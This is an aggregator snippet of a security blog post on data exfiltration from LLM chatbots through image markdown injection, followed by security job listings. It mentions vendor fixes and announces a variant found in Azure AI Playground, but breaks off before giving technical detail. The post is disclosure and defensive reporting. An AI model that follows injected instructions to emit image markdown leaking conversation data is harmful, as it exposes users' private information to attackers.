e
Sept. 29, 2023, 5 p.m. |

Embrace The Red embracethered.com

Large Language Model (LLM) applications and chatbots are quite commonly vulnerable to data exfiltration. In particular data exfiltration via Image Markdown Injection is quite frequent.
Microsoft fixed such a vulnerability in Bing Chat, Anthropic fixed it in Claude, and ChatGPT has a known vulnerability as Open AI “won’t fix” the issue.
This post describes a variant in the Azure AI Playground and how Microsoft fixed it.
From Untrusted Data to Data Exfiltration When untrusted data makes it into the LLM …

anthropic applications azure bing bing chat chat chatbots chatgpt claude data data exfiltration exfiltration fix fixes image injection issue known vulnerability language large large language model llm microsoft open ai vulnerability vulnerable

Azure DevSecOps Cloud Engineer II

@ Prudent Technology | McLean, VA, USA

Security Engineer III - Python, AWS

@ JPMorgan Chase & Co. | Bengaluru, Karnataka, India

SOC Analyst (Threat Hunter)

@ NCS | Singapore, Singapore

Managed Services Information Security Manager

@ NTT DATA | Sydney, Australia

Senior Security Engineer (Remote)

@ Mattermost | United Kingdom

Penetration Tester (Part Time & Remote)

@ TestPros | United States - Remote